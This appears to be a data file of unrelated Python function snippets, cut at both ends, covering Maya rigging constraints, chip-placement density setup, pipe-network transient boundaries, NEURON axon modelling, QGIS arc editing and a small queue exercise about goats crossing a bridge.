#Main Track curve ============================================================================\n ml_handles_chain = [ml_handles[0]] + ml_midHandles + [ml_handles[-1]]\n\n log.debug(\"|{0}| >> Main TrackCrv...\".format(_str_func)) \n _mainTrackResult = CORERIG.create_at([mObj.mNode for mObj in ml_handles_chain],'linearTrack',\n baseName='mainTrack')\n\n mMainTrackCurve = cgmMeta.validateObjArg(_mainTrackResult[0],'cgmObject')\n mMainTrackCurve.rename(_baseName+ 'mainHandlesTrack_crv')\n mMainTrackCurve.parent = mNoTransformNull\n\n for s in _mainTrackResult[1]:\n ATTR.set(s[1],'visibility',False) \n\n\n\n log.debug(\"|{0}| >> Aim main handles...\".format(_str_func)+'-'*40) \n\n #AimEndHandle ============================================================================\n log.debug(\"|{0}| >> Aim end...\".format(_str_func)) \n mGroup = md_handles['end'].doGroup(True,True,asMeta=True,typeModifier = 'aim') \n _const = mc.aimConstraint(self.mNode, mGroup.mNode,\n maintainOffset = False,\n aimVector = [0,0,-1],\n upVector = [0,1,0], \n worldUpObject = mRootUpHelper.mNode,\n worldUpType = 'objectrotation', \n worldUpVector = [0,1,0]) \n #mAimGroup = md_handles['end'].doGroup(True, asMeta=True,typeModifier = 'aim')\n #...not doing this now...\n #SNAP.go(md_handles['end'].mNode, self.mNode, position=False)\n\n \"\"\"\n _const = mc.aimConstraint(self.mNode, md_handles['end'].mNode, maintainOffset = False,\n aimVector = [0,0,-1], upVector = [0,1,0], \n worldUpObject = mBaseOrientCurve.mNode,\n worldUpType = 'objectrotation', \n worldUpVector = [0,1,0])\"\"\"\n\n #cgmMeta.cgmNode(_const[0]).doConnectIn('worldUpVector','{0}.baseUp'.format(self.mNode))\n\n\n #AimStartHandle ============================================================================\n log.debug(\"|{0}| >> Aim main handles...\".format(_str_func)) \n mGroup = md_handles['start'].doGroup(True,True,asMeta=True,typeModifier = 'aim') \n _const = mc.aimConstraint(md_handles['end'].mNode, mGroup.mNode,\n maintainOffset = False,\n aimVector = [0,0,1],\n upVector = [0,1,0], \n worldUpObject = mRootUpHelper.mNode,\n worldUpType = 'objectrotation', \n worldUpVector = [0,1,0])\n\n\n\n #>>> Aim Main loft curves ================================================================== \n log.debug(\"|{0}| >> Aim main loft curves...\".format(_str_func)) \n\n\n #Aim the segment -------------------------------------------------------------------------\n \"\"\"\n if _formAim == 'toEnd':\n for i,mHandle in enumerate(ml_handles):\n if mHandle != ml_handles[0] and mHandle != ml_handles[-1]:\n #if i > 0 and i < len(ml_handles) - 1:\n mAimGroup = mHandle.doGroup(True,asMeta=True,typeModifier = 'aim')\n\n mc.aimConstraint(ml_handles[-1].mNode, mAimGroup.mNode, maintainOffset = True, #skip = 'z',\n aimVector = [0,0,1], upVector = [0,1,0], worldUpObject = mBaseOrientCurve.mNode,\n worldUpType = 'objectrotation', worldUpVector = [0,1,0])\n else:#chain\n for i,mHandle in enumerate(ml_handles):\n if mHandle != ml_handles[0] and mHandle != ml_handles[-1]:\n #if i > 0 and i < len(ml_handles) - 1:\n mAimGroup = mHandle.doGroup(True,asMeta=True,typeModifier = 'aim')\n\n mc.aimConstraint(ml_handles[i+1].mNode, mAimGroup.mNode,\n maintainOffset = True,\n aimVector = [0,0,1],\n upVector = [0,1,0],\n worldUpObject = mHandle.masterGroup.mNode,\n worldUpType = 'objectrotation', worldUpVector = [0,1,0])\"\"\"\n\n\n for i,mHandle in enumerate(ml_handles_chain):\n mLoft = mHandle.loftCurve\n _str_handle = mHandle.mNode\n\n mTransformedGroup = mLoft.getMessageAsMeta('transformedGroup')\n if not mTransformedGroup:\n mTransformedGroup = mLoft.doGroup(True,asMeta=True,typeModifier = 'transformed')\n \n mLoft.visibility = 1\n #mLoft.setAttrFlags(['translate'])\n\n for mShape in mLoft.getShapes(asMeta=True):\n mShape.overrideDisplayType = 0\n \n if _formAim == 'orientToHandle':\n mc.orientConstraint([mHandle.mNode],\n mTransformedGroup.mNode, maintainOffset = False)\n else:\n _worldUpType = 'objectrotation'\n _worldUpBack = 'objectrotation'\n \n \n _aimBack = None\n _aimForward = None\n _backUpObj = None\n \n if mHandle == ml_handles_chain[0]:\n _aimForward = ml_handles_chain[i+1].mNode\n elif mHandle == ml_handles_chain[-1]:\n if len(ml_handles_chain)>2:\n _aimBack = ml_handles_chain[-2].mNode#md_handles['start'].mNode#ml_handles_chain[].mNode\n else:\n _aimBack = md_handles['start'].mNode\n else:\n _aimForward = ml_handles_chain[i+1].mNode\n _aimBack = ml_handles_chain[i-1].mNode\n \n if _aimBack and md_handles.get('lever'):\n if _aimBack == md_handles.get('lever').mNode:\n _backUpObj = md_handles.get('lever').mNode\n \n if _aimForward and _aimBack is None:\n mc.aimConstraint(_aimForward, mTransformedGroup.mNode, maintainOffset = False,\n aimVector = [0,0,1], upVector = [0,1,0], \n worldUpObject = mBaseOrientCurve.mNode,\n worldUpType = _worldUpType, \n worldUpVector = [0,1,0])\n elif _aimBack and _aimForward is None:\n mc.aimConstraint(_aimBack, mTransformedGroup.mNode, maintainOffset = False,\n aimVector = [0,0,-1], upVector = [0,1,0], \n worldUpObject = mBaseOrientCurve.mNode,\n worldUpType = _worldUpBack, \n worldUpVector = [0,1,0])\n else:\n mAimForward = mLoft.doCreateAt()\n mAimForward.p_parent = mHandle.p_parent#mLoft\n mAimForward.doStore('cgmName',mHandle) \n mAimForward.doStore('cgmTypeModifier','forward')\n mAimForward.doStore('cgmType','aimer')\n mAimForward.doName()\n \n mAimBack = mLoft.doCreateAt()\n mAimBack.p_parent = mHandle.p_parent\n mAimBack.doStore('cgmName',mHandle) \n mAimBack.doStore('cgmTypeModifier','back')\n mAimBack.doStore('cgmType','aimer')\n mAimBack.doName()\n \n mc.aimConstraint(_aimForward, mAimForward.mNode, maintainOffset = False,\n aimVector = [0,0,1], upVector = [0,1,0], \n worldUpObject = mBaseOrientCurve.mNode,\n worldUpType = _worldUpType, \n worldUpVector = [0,1,0])\n \n if _backUpObj == None:\n _backUpObj = mBaseOrientCurve.mNode\n \n mc.aimConstraint(_aimBack, mAimBack.mNode, maintainOffset = False,\n aimVector = [0,0,-1], upVector = [0,1,0], \n worldUpObject = _backUpObj,\n worldUpType = _worldUpType, \n worldUpVector = [0,1,0]) \n \n const = mc.orientConstraint([mAimForward.mNode, mAimBack.mNode],\n mTransformedGroup.mNode, maintainOffset = False)[0]\n \n ATTR.set(const,'interpType',2)#.shortest...\n \n #...also aim our main handles...\n \n if mHandle not in [md_handles['end'],md_handles['start']]:\n log.debug(\"|{0}| >> {2} | Aiming Handle: {1}\".format(_str_func,mHandle,_formAim))\n _aimForward = ml_handles_chain[i+1].mNode\n \n mHandleAimGroup = mHandle.getMessageAsMeta('transformedGroup')\n if not mHandleAimGroup:\n mHandleAimGroup = mHandle.doGroup(True,asMeta=True,typeModifier = 'transformed')\n\n if _formAim == 'toEnd':\n mc.aimConstraint(md_handles['end'].mNode,\n mHandleAimGroup.mNode, maintainOffset = False,\n aimVector = [0,0,1], upVector = [0,1,0], \n worldUpObject = mBaseOrientCurve.mNode,\n worldUpType = 'objectrotation', \n worldUpVector = [0,1,0])\n elif _formAim == 'chain':\n mc.aimConstraint(_aimForward, mHandleAimGroup.mNode, maintainOffset = False,\n aimVector = [0,0,1], upVector = [0,1,0], \n worldUpObject = mBaseOrientCurve.mNode,\n worldUpType = 'objectrotation', \n worldUpVector = [0,1,0])\n\n \"\"\"\n if mHandle in [md_handles['start'],md_handles['end']]:\n _lock = []\n #if mHandle == md_handles['start']:\n # _lock.append('rotate')\n\n ##ATTR.set_alias(mHandle.mNode,'sy','handleScale') \n ##ATTR.set_standardFlags( mHandle.mNode, _lock)\n ##mHandle.doConnectOut('sy',['sx','sz'])\n #ATTR.set_standardFlags( mHandle.mNode, _lock)\n\n else:\n ATTR.set_standardFlags( mHandle.mNode, ['sz'])\n ATTR.connect('{0}.sy'.format(mHandle.mNode), '{0}.sz'.format(mHandle.mNode))\"\"\"\n\n\n ml_shapers = copy.copy(ml_handles_chain)\n #>>> shaper handles =======================================================================\n if _int_sub or l_numSubShapers:\n _numSubShapers = _int_sub\n ml_shapers = []\n log.debug(\"|{0}| >> Sub shaper handles: {1}\".format(_str_func,_numSubShapers))\n \n\n mOrientHelper = mBaseOrientCurve\n\n log.debug(\"|{0}| >> pairs...\".format(_str_func))\n\n\n ml_handlesToShaper = ml_handles_chain\n ml_shapers = [ml_handlesToShaper[0]]\n\n ml_pairs = LISTS.get_listPairs(ml_handlesToShaper)\n #pprint.pprint(ml_pairs)\n\n\n for i,mPair in enumerate(ml_pairs):\n log.debug(cgmGEN._str_subLine)\n ml_shapersTmp = []\n \n _numSubShapers = l_numSubShapers[i]\n\n _mStart = mPair[0]\n _mEnd = mPair[1]\n _end = _mEnd.mNode\n log.debug(\"|{0}| >> pairs: {1} | end: {2}\".format(_str_func,i,_end))\n\n _pos_start = _mStart.p_position\n _pos_end = _mEnd.p_position \n\n _leverLoftAimMode = False\n\n \n\n _vec = MATH.get_vector_of_two_points(_pos_start, _pos_end)\n _offsetDist = DIST.get_distance_between_points(_pos_start,_pos_end) / (_numSubShapers+1)\n _l_pos_seg = [ DIST.get_pos_by_vec_dist(_pos_start,\n _vec,\n (_offsetDist * ii)) for ii in range(_numSubShapers+1)] + [_pos_end]\n\n _mVectorAim = MATH.get_vector_of_two_points(_pos_start, _pos_end,asEuclid=True)\n #_mVectorUp = _mVectorAim.up()\n #_worldUpVector = [_mVectorUp.x,_mVectorUp.y,_mVectorUp.z] \n\n\n #Linear track curve ----------------------------------------------------------------------\n _linearCurve = mc.curve(d=1,p=[_pos_start,_pos_end])\n mLinearCurve = cgmMeta.validateObjArg(_linearCurve,'cgmObject')\n\n l_clusters = []\n for ii,cv in enumerate(mLinearCurve.getComponents('cv')):\n _res = mc.cluster(cv, n = 'seg_{0}_{1}_cluster'.format(mPair[0].p_nameBase,ii))\n mCluster = cgmMeta.asMeta(_res[1])\n mCluster.p_parent = mFormNull\n mCluster.v = 0\n mc.pointConstraint(mPair[ii].mNode,\n mCluster.mNode,maintainOffset=True)\n l_clusters.append(_res)\n\n mLinearCurve.parent = mNoTransformNull\n mLinearCurve.rename('seg_{0}_trackCrv'.format(i))\n\n\n\n #Tmp loft mesh -------------------------------------------------------------------\n _l_targets = [mObj.loftCurve.mNode for mObj in mPair]\n log.debug(_l_targets)\n _res_body = mc.loft(_l_targets, o = True, d = 3, po = 0 )\n _str_tmpMesh =_res_body[0]\n\n l_scales_seg = []\n\n #Sub handles... --------------------------------------------------------------------------\n for ii,p in enumerate(_l_pos_seg[1:-1]):\n #mHandle = mHandleFactory.buildBaseShape('circle', _size, shapeDirection = 'y+')\n mHandle = cgmMeta.cgmObject(name = 'subHandle_{0}_{1}'.format(i,ii))\n _short = mHandle.mNode\n ml_handles.append(mHandle)\n mHandle.p_position = p\n if _leverLoftAimMode:\n SNAP.aim_atPoint(_short,_l_pos_seg[ii+2],'z+', 'y+', mode='vector',\n vectorUp = _mVectorLeverUp)\n else:\n SNAP.aim_atPoint(_short,_l_pos_seg[ii+2],'z+', 'y+', mode='vector', vectorUp = _mVectorUp)\n\n #...Make our curve\n _d = RAYS.cast(_str_tmpMesh, _short, 'x+')\n #pprint.pprint(_d)\n log.debug(\"|{0}| >> Casting {1} ...\".format(_str_func,_short))\n cgmGEN.log_info_dict(_d)\n _v = _d['uvs'][_str_tmpMesh][0][0]\n log.debug(\"|{0}| >> v: {1} ...\".format(_str_func,_v))\n\n #>>For each v value, make a new curve ----------------------------------------------------------------- \n #duplicateCurve -ch 1 -rn 0 -local 0 \"loftedSurface2.u[0.724977270271534]\"\n _crv = mc.duplicateCurve(\"{0}.u[{1}]\".format(_str_tmpMesh,_v), ch = 0, rn = 0, local = 0)\n log.debug(\"|{0}| >> created: {1} ...\".format(_str_func,_crv)) \n\n CORERIG.shapeParent_in_place(_short, _crv, False)\n\n #self.copyAttrTo(_baseNameAttrs[1],mHandle.mNode,'cgmName',driven='target')\n self.copyAttrTo('cgmName',mHandle.mNode,'cgmName',driven='target')\n mHandle.doStore('cgmNameModifier','form_{0}_sub_{1}'.format(i,ii))\n mHandle.doStore('cgmType','shapeHandle')\n mHandle.doName()\n\n mHandle.p_parent = mFormNull\n\n mGroup = mHandle.doGroup(True,True,asMeta=True,typeModifier = 'master')\n mGroup.p_parent = mFormNull\n\n _vList = DIST.get_normalizedWeightsByDistance(mGroup.mNode,[mPair[0].mNode,mPair[1].mNode])\n\n\n if _leverLoftAimMode:\n upObj = md_handles['lever'].mNode\n else:\n upObj = mBaseOrientCurve.mNode\n\n\n\n \n BLOCKSHAPES.attachToCurve(mHandle, mLinearCurve, parentTo = mNoTransformNull, trackLink='masterGroup')\n \"\"\"\n _res_attach = RIGCONSTRAINT.attach_toShape(mGroup.mNode, \n mLinearCurve.mNode,\n 'conPoint')\n TRANS.parent_set(_res_attach[0], mNoTransformNull.mNode)\"\"\"\n # Has to be after the bind\n _scale = mc.scaleConstraint([mPair[0].mNode,mPair[1].mNode],mGroup.mNode,maintainOffset = False)#Point contraint loc to the object\n\n for c in [_scale]:\n CONSTRAINT.set_weightsByDistance(c[0],_vList)\n \n mc.aimConstraint([_end], mGroup.mNode, maintainOffset = False, #skip = 'z',\n aimVector = [0,0,1], upVector = [0,1,0],\n worldUpObject = upObj,\n worldUpType = 'objectrotation', worldUpVector = [0,1,0]) \n\n #Convert to loft curve setup ----------------------------------------------------\n mHandleFactory = self.asHandleFactory(mHandle.mNode)\n #mHandleFactory.rebuildAsLoftTarget('self', None, shapeDirection = 'z+')\n mHandle.doStore('loftCurve',mHandle)\n\n \n CORERIG.colorControl(mHandle.mNode,_side,'sub',transparent = True) \n #LOC.create(position = p)\n ml_shapers.append(mHandle)\n ml_shapersTmp.append(mHandle)\n\n\n ml_shapers.append(mPair[1])\n mc.delete(_res_body)\n\n _mStart.msgList_connect('subShapers',[mObj.mNode for mObj in ml_shapersTmp]) \n\n #Push scale back...\n #for mHandle in mPair:\n #mHandle.scale = l_scales_seg[i]\n\n #Form Loft Mesh -------------------------------------\n #mFormLoft = self.getMessage('formLoftMesh',asMeta=True)[0] \n #for s in mFormLoft.getShapes(asMeta=True):\n #s.overrideDisplayType = 1 \n\n\n #Aim the segment\n \"\"\"\n for ii,mHandle in enumerate(ml_shapersTmp):\n mAimGroup = mHandle.doGroup(True,asMeta=True,typeModifier = 'aim')\n log.debug(\"|{0}| >> seg constrain: {1} {2} | end: {3}\".format(_str_func,i,ii,_end))\n\n mc.aimConstraint([_end], mAimGroup.mNode, maintainOffset = True, #skip = 'z',\n aimVector = [0,0,1], upVector = [0,1,0],\n worldUpObject = mBaseOrientCurve.mNode,\n worldUpType = 'objectrotation', worldUpVector = [0,1,0])\"\"\" \n \n \n controller_wireHandles(self,ml_handles + ml_shapers,'form')\n controller_walkChain(self,ml_handles_chain,'form')\n \n \"\"\"\n ml_done = []\n if cgmGEN.__mayaVersion__ >= 2018:\n \n for mHandle in ml_handles + ml_shapers:\n if mHandle in ml_done:\n continue\n if not mHandle:\n continue\n mLoft = mHandle.getMessageAsMeta('loftCurve')\n if mLoft:\n mLoft = cgmMeta.controller_get(mLoft)\n mLoft.visibilityMode = 2\n ml_done.append(mLoft)\n mController = cgmMeta.controller_get(mHandle)\n mController.visibilityMode = 2 \n ml_done.append(mController)\n \n \n \n for mObj in ml_done:\n try:\n ATTR.connect(\"{0}.visProximityMode\".format(self.mNode),\n \"{0}.visibilityMode\".format(mObj.mNode)) \n except Exception,err:\n log.error(err)\n\n self.msgList_append('formStuff',mObj)\n \"\"\"\n return md_handles,ml_handles,ml_shapers,ml_handles_chain", "def StretchBlit(*args, **kwargs):\n return _gdi_.DC_StretchBlit(*args, **kwargs)", "def __init__(self,\n num_heads=8,\n seq_len=1024,\n block=16,\n different_layout_per_head=False):\n super().__init__(num_heads, seq_len, block, different_layout_per_head)\n self.make_layout()", "def pick_berries(deli):\n bridge = make_empty_queue()\n field = make_empty_queue()\n\n total_weight = 0\n bridge_is_broken = False\n max_goats = 15\n max_weight = 1200\n\n while not bridge_is_broken and not empty_stack(deli):\n if bridge.size == max_goats:\n goat = dequeue(bridge)\n print(\"The bridge is full.\", goat.name,\n \"finishes crossing it...\")\n enqueue(field, goat)\n total_weight -= goat.weight\n\n goat = pop(deli)\n\n print(goat.name, \"of weight\", goat.weight,\n \"steps onto the bridge.\")\n enqueue(bridge, goat)\n total_weight += goat.weight\n print(\"Total weight on bridge:\", total_weight)\n print(\"Number of goats on the bridge:\", bridge.size)\n\n if total_weight > max_weight:\n print(\"OH NO! Fat goats broke the bridge!\")\n bridge_is_broken = True\n\n if bridge_is_broken:\n while not empty_queue(bridge):\n croc_food = dequeue(bridge)\n print(croc_food.name,\n \"falls into the water below!\")\n\n while not empty_stack(deli):\n starving = pop(deli)\n print(starving.name, \"is trapped inside the deli!\")\n else:\n while not empty_queue(bridge):\n goat = dequeue(bridge)\n print(goat.name, \"finishes crossing the bridge...\")\n enqueue(field, goat)\n\n print(field.size, \"goat/s successfully picking berries!\")", "def __init__(\n self,\n node_size_x,\n node_size_y,\n bin_center_x,\n bin_center_y,\n target_density,\n xl,\n yl,\n xh,\n yh,\n bin_size_x,\n bin_size_y,\n num_movable_nodes,\n num_terminals,\n num_filler_nodes,\n padding,\n deterministic_flag, # control whether to use deterministic routine\n sorted_node_map,\n movable_macro_mask=None,\n fast_mode=False,\n region_id=None,\n fence_regions=None, # [n_subregion, 4] as dummy macros added to initial density. (xl,yl,xh,yh) rectangles\n node2fence_region_map=None,\n placedb=None\n ):\n\n if(region_id is not None):\n ### reconstruct data structure\n num_nodes = placedb.num_nodes\n if(region_id < len(placedb.regions)):\n self.fence_region_mask = node2fence_region_map[:num_movable_nodes] == region_id\n else:\n self.fence_region_mask = node2fence_region_map[:num_movable_nodes] >= len(placedb.regions)\n\n node_size_x = torch.cat([node_size_x[:num_movable_nodes][self.fence_region_mask],\n node_size_x[num_movable_nodes:num_nodes-num_filler_nodes],\n node_size_x[num_nodes-num_filler_nodes+placedb.filler_start_map[region_id]:num_nodes-num_filler_nodes+placedb.filler_start_map[region_id+1]]], 0)\n node_size_y = torch.cat([node_size_y[:num_movable_nodes][self.fence_region_mask],\n node_size_y[num_movable_nodes:num_nodes-num_filler_nodes],\n node_size_y[num_nodes-num_filler_nodes+placedb.filler_start_map[region_id]:num_nodes-num_filler_nodes+placedb.filler_start_map[region_id+1]]], 0)\n\n num_movable_nodes = (self.fence_region_mask).long().sum().item()\n num_filler_nodes = placedb.filler_start_map[region_id+1]-placedb.filler_start_map[region_id]\n if(movable_macro_mask is not None):\n movable_macro_mask = movable_macro_mask[self.fence_region_mask]\n ## sorted cell is recomputed\n sorted_node_map = torch.sort(node_size_x[:num_movable_nodes])[1].to(torch.int32)\n ## make pos mask for fast forward\n self.pos_mask = torch.zeros(2, placedb.num_nodes, dtype=torch.bool, device=node_size_x.device)\n self.pos_mask[0,:placedb.num_movable_nodes].masked_fill_(self.fence_region_mask, 1)\n self.pos_mask[1,:placedb.num_movable_nodes].masked_fill_(self.fence_region_mask, 1)\n self.pos_mask[:,placedb.num_movable_nodes:placedb.num_nodes-placedb.num_filler_nodes] = 1\n self.pos_mask[:,placedb.num_nodes-placedb.num_filler_nodes+placedb.filler_start_map[region_id]:placedb.num_nodes-placedb.num_filler_nodes+placedb.filler_start_map[region_id+1]] = 1\n self.pos_mask = self.pos_mask.view(-1)\n\n super(ElectricPotential,\n self).__init__(node_size_x=node_size_x,\n node_size_y=node_size_y,\n bin_center_x=bin_center_x,\n bin_center_y=bin_center_y,\n target_density=target_density,\n xl=xl,\n yl=yl,\n xh=xh,\n yh=yh,\n bin_size_x=bin_size_x,\n bin_size_y=bin_size_y,\n num_movable_nodes=num_movable_nodes,\n num_terminals=num_terminals,\n num_filler_nodes=num_filler_nodes,\n padding=padding,\n deterministic_flag=deterministic_flag,\n sorted_node_map=sorted_node_map,\n movable_macro_mask=movable_macro_mask)\n self.fast_mode = fast_mode\n self.fence_regions = fence_regions\n self.node2fence_region_map = node2fence_region_map\n self.placedb = placedb\n self.target_density = target_density\n self.region_id = region_id\n ## set by build_density_op func\n self.filler_start_map = None\n self.filler_beg = None\n self.filler_end = None", "def setup():\n size(800, 600)\n stroke_weight(3)", "def trans_setup():\n # slot7 slot6 slot5 slot4 slot3 slot2 slot1 <------ beam direction (slot 8 is currently B-fiber only)\n # Be Be Be Be Be Be Be lens material\n # 1.5 1.5 0.5 0.5 0.5 0.5 0.5 lens radius [mm]\n # 1 1 5 8 4 2 1 number of lenses\n lens_R=[0.5,0.5,0.5,0.5,0.5,1.5,1.5]\n lens_mat=['Be','Be','Be','Be','Be','Be','Be']\n lens_N=[1,2,4,8,5,1,1]\n trans_pos=[35.2,35.8]\n return {'lens_material':lens_mat,'lens_number':lens_N,'lens_radius':lens_R,'trans_position':trans_pos}", "def glow_boundary(bound):\n assert bound < 4\n global layout\n temp = len(layout) - 1\n for i in range(bound, bound + len_square(bound)):\n for j in range(bound, bound + len_square(bound)): # TODO: assign this to a variable\t\n layout[i][j] = 1", "def left_boundary(linkp, pn, H, V, H0, V0, links2, p, pump, valve, dt,\n H20, V20, utype, dtype,\n friction, dVdt, dVdx, dVdt20, dVdx20) :\n\n link2 = [p[abs(i)-1] for i in links2]\n # Properties of current pipe\n f = linkp.roughness # unitless\n D = linkp.diameter # m\n g = 9.8 # m/s^2\n a = linkp.wavev # m/s\n n = linkp.number_of_segments # spatial discretization\n KD = linkp.roughness_height\n\n # inner nodes\n if friction == 'steady':\n H[1:-1], V[1:-1] = inner_node_steady(linkp, H0, V0, dt, g)\n elif friction == 'quasi-steady':\n H[1:-1], V[1:-1] = inner_node_quasisteady(linkp, H0, V0, dt, g)\n else:\n H[1:-1], V[1:-1] = inner_node_unsteady(linkp, H0, V0, dt, g,\n dVdx, dVdt)\n\n # Pipe start (outer boundayr conditions)\n V2 = V0[1]; H2 = H0[1]\n dVdx2 = dVdx[0]; dVdt2= dVdt[1]\n if utype[0] == 'Reservoir' or utype[0] == 'Tank':\n H[0], V[0] = rev_end (H2, V2, H[0], 0, a, g, f, D, dt,\n KD, friction, dVdx2, dVdt2)\n elif utype[0] == 'Valve':\n H[0], V[0] = valve_end (H2, V2, V[0], 0, a, g, f, D, dt,\n KD, friction, dVdx2, dVdt2)\n elif utype[0] == 'Junction':\n elev = linkp.start_node.elevation\n H[0], V[0] = dead_end (linkp , H2, V2, elev, 0, a, g, f, D, dt,\n KD, friction, dVdx2, dVdt2)\n elif utype[0] == 'Pump': #source pump\n H[0], V[0] = source_pump(pump[0], linkp, H2, V2, dt, g, [-1],\n friction, dVdx2, dVdt2)\n\n # Pipe end (inner boundary conditions)\n V1 = V0[n-1]; H1 = H0[n-1] # upstream node\n V2 = V20; H2 = H20 # downstream nodes\n dVdx1 = dVdx[n-1] ; dVdx2 = dVdx20\n dVdt1 = dVdt[n-1] ; dVdt2 = dVdt20\n\n if dtype[0] == 'Pipe':\n if linkp.end_node.transient_node_type == 'SurgeTank':\n shape = linkp.end_node.tank_shape\n H[n], V[n], Qs = surge_tank(shape, linkp, link2,\n H1, V1, H2, V2, dt, g, n, [1], np.sign(links2),\n friction, dVdx1, dVdx2, dVdt1, dVdt2)\n linkp.end_node.water_level = H[n]\n linkp.end_node.tank_flow = Qs\n\n elif linkp.end_node.transient_node_type == 'Chamber':\n shape = linkp.end_node.tank_shape\n H[n], V[n], Qs, zp = air_chamber(shape, linkp, link2,\n H1, V1, H2, V2, dt, g, n, [1], np.sign(links2),\n friction, dVdx1, dVdx2, dVdt1, dVdt2)\n linkp.end_node.water_level = zp\n linkp.end_node.tank_flow = Qs\n else:\n elev = linkp.end_node.elevation\n emitter_coeff = linkp.end_node.emitter_coeff + linkp.end_node.demand_coeff\n block_per = linkp.end_node.block_per\n H[n], V[n] = add_leakage(emitter_coeff, block_per,linkp, link2, elev,\n H1, V1, H2, V2, dt, g, n, [1], np.sign(links2),\n friction, dVdx1, dVdx2, dVdt1, dVdt2)\n\n elif dtype[0] == 'Pump':\n pumpc = pump[1]\n H[n], V[n] = pump_node(pumpc, linkp, link2,\n H1, V1, H2, V2, dt, g, n, [1], np.sign(links2),\n friction, dVdx1, dVdx2, dVdt1, dVdt2)\n\n elif dtype[0] == 'Valve':\n valvec = valve[1]\n if links2 == []:\n H[n], V[n] = valve_end (H1, V1, V[n], n, a, g, f, D, dt,\n KD, friction, dVdx1, dVdt1)\n else:\n H[n], V[n] = valve_node(valvec, linkp, link2,\n H1, V1, H2, V2, dt, g, n, [1], np.sign(links2),\n friction, dVdx1, dVdx2, dVdt1, dVdt2)\n\n elif dtype[0] == 'Junction':\n elev = linkp.end_node.elevation\n H[n], V[n] = dead_end (linkp, H1, V1, elev, n, a, g, f, D, dt,\n KD, friction, dVdx1, dVdt1)\n\n return H, V", "def gripStretchArc(arc, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve, inverseArc = None):\n startPt = arc.getStartPt()\n endPt = arc.getEndPt()\n middlePt = arc.getMiddlePt()\n newStartPt = QgsPoint(startPt)\n newEndPt = QgsPoint(endPt)\n newMiddlePt = QgsPoint(middlePt)\n newCenter = None\n startPtChanged = endPtChanged = middlePtPtChanged = False\n for ptToStretch in ptListToStretch:\n if qad_utils.ptNear(ptToStretch, arc.center): # se i punti sono sufficientemente vicini\n newCenter = QgsPoint(arc.center.x() + offSetX, arc.center.y() + offSetY)\n else:\n if qad_utils.ptNear(startPt, ptToStretch):\n newStartPt.set(startPt.x() + offSetX, startPt.y() + offSetY)\n startPtChanged = True\n elif qad_utils.ptNear(endPt, ptToStretch):\n newEndPt.set(endPt.x() + offSetX, endPt.y() + offSetY)\n endPtChanged = True\n elif qad_utils.ptNear(middlePt, ptToStretch):\n newMiddlePt.set(middlePt.x() + offSetX, middlePt.y() + offSetY)\n middlePtPtChanged = True\n \n newArc = qad_arc.QadArc()\n if newArc.fromStartSecondEndPts(newStartPt, newMiddlePt, newEndPt) == False:\n return None\n \n # se il centro era nei punti di grip\n if newCenter is not None:\n # se i tre punti dell'arco erano nei punti di grip oppure\n # allora non cambio il centro\n if (startPtChanged and endPtChanged and middlePtPtChanged):\n pass\n else:\n newArc.center.set(newCenter.x(), newCenter.y())\n \n if inverseArc is not None: # se l'arco faceva parte di una linestring\n # verifico il verso del nuovo arco\n if qad_utils.ptNear(newStartPt, newArc.getStartPt()):\n # stesso verso del vecchio arco\n return newArc, inverseArc\n else:\n return newArc, not inverseArc\n \n return newArc", "def _define_biophysics(self):\n\t\tfor node in self.node:\n\t\t\tnode.nseg=1\n\t\t\tnode.diam=self._nodeD\n\t\t\tnode.L=self._nodeLength\n\t\t\tnode.Ra=self._rhoa/10000\n\t\t\tnode.cm=2\n\t\t\tnode.insert('axnode')\n\t\t\tnode.insert('extracellular')\n\t\t\tnode.xraxial[0]=self._Rpn0\n\t\t\tnode.xg[0]=1e10\n\t\t\tnode.xc[0]=0\n\n\t\tfor mysa in self.mysa:\n\t\t\tmysa.nseg=1\n\t\t\tmysa.diam=self._fiberD\n\t\t\tmysa.L=self._paraLength1\n\t\t\tmysa.Ra=self._rhoa*(1/(self._paraD1/self._fiberD)**2)/10000\n\t\t\tmysa.cm=2*self._paraD1/self._fiberD\n\t\t\tmysa.insert('pas')\n\t\t\tmysa.g_pas=0.001*self._paraD1/self._fiberD\t\t\n\t\t\tmysa.e_pas=-80\n\t\t\tmysa.insert('extracellular')\n\t\t\tmysa.xraxial[0]=self._Rpn1\n\t\t\tmysa.xg[0]=self._mygm/(self._nl*2)\n\t\t\tmysa.xc[0]=self._mycm/(self._nl*2)\n\n\t\tfor flut in self.flut:\n\t\t\tflut.nseg=1\n\t\t\tflut.diam=self._fiberD\n\t\t\tflut.L=self._paraLength2\n\t\t\tflut.Ra=self._rhoa*(1/(self._paraD2/self._fiberD)**2)/10000\n\t\t\tflut.cm=2*self._paraD2/self._fiberD\n\t\t\tflut.insert('pas')\n\t\t\tflut.g_pas=0.0001*self._paraD2/self._fiberD\t\t\n\t\t\tflut.e_pas=-80\n\t\t\tflut.insert('extracellular')\n\t\t\tflut.xraxial[0]=self._Rpn2\n\t\t\tflut.xg[0]=self._mygm/(self._nl*2)\n\t\t\tflut.xc[0]=self._mycm/(self._nl*2)\n\t\t\n\t\tfor stin in self.stin:\n\t\t\tstin.nseg=1\n\t\t\tstin.diam=self._fiberD\n\t\t\tstin.L=self._interLength\n\t\t\tstin.Ra=self._rhoa*(1/(self._axonD/self._fiberD)**2)/10000\n\t\t\tstin.cm=2*self._axonD/self._fiberD\n\t\t\tstin.insert('pas')\n\t\t\tstin.g_pas=0.0001*self._axonD/self._fiberD\n\t\t\tstin.e_pas=-80\n\t\t\tstin.insert('extracellular')\n\t\t\tstin.xraxial[0]=self._Rpx\n\t\t\tstin.xg[0]=self._mygm/(self._nl*2)\n\t\t\tstin.xc[0]=self._mycm/(self._nl*2)", "def right_boundary(linkp, pn, H0, V0, H, V, links1, p, pump, valve, dt,\n H10, V10, utype, dtype,\n friction, dVdt, dVdx, dVdt10, dVdx10):\n\n # Properties of current pipe\n link1 = [p[abs(i)-1] for i in links1]\n f = linkp.roughness # unitless\n D = linkp.diameter # m\n g = 9.8 # m/s^2\n a = linkp.wavev # m/s\n n = linkp.number_of_segments # spatial discretization\n KD = linkp.roughness_height\n\n # inner nodes\n if friction == 'steady':\n H[1:-1], V[1:-1] = inner_node_steady(linkp, H0, V0, dt, g)\n elif friction == 'quasi-steady':\n H[1:-1], V[1:-1] = inner_node_quasisteady(linkp, H0, V0, dt, g)\n else:\n H[1:-1], V[1:-1] = inner_node_unsteady(linkp, H0, V0, dt, g,\n dVdx, dVdt)\n\n # Pipe start (inner boundary conditions)\n V1 = V10; H1 = H10 # upstream node\n V2 